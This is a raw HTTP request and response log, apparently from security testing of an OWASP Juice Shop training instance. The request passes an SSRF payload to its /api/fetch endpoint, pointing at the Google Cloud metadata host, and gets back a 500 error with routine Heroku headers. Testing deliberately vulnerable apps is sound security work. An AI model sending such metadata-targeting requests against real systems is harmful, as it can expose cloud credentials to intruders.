=== REQUEST ===
GET https://juice-shop.herokuapp.com/api/fetch?url=http%3A%2F%2Fmetadata.google.internal HTTP/1.1

=== RESPONSE ===
HTTP/1.1 500 Internal Server Error
Date: Thu, 03 Apr 2025 21:18:53 GMT
Nel: {"report_to":"heroku-nel","response_headers":["Via"],"max_age":3600,"success_fraction":0.01,"failure_fraction":0.1}
X-Frame-Options: SAMEORIGIN
X-Recruiting: /#/jobs
Access-Control-Allow-Origin: *
Feature-Policy: payment 'self'
Report-To: {"group":"heroku-nel","endpoints":[{"url":"https://nel.heroku.com/reports?s=82PXu5bp0t8delTb8k7O9LDtsep1FLFaN5Spq0LmXBU%3D\u0026sid=812dcc77-0bd0-43b1-a5f1-b25750382959\u0026ts=1743715133"}],"max_age":3600}
Reporting-Endpoints: heroku-nel="https://nel.heroku.com/reports?s=82PXu5bp0t8delTb8k7O9LDtsep1FLFaN5Spq0LmXBU%3D&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&ts=1743715133"
Server: Heroku
Via: 1.1 heroku-router
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-Content-Type-Options: nosniff

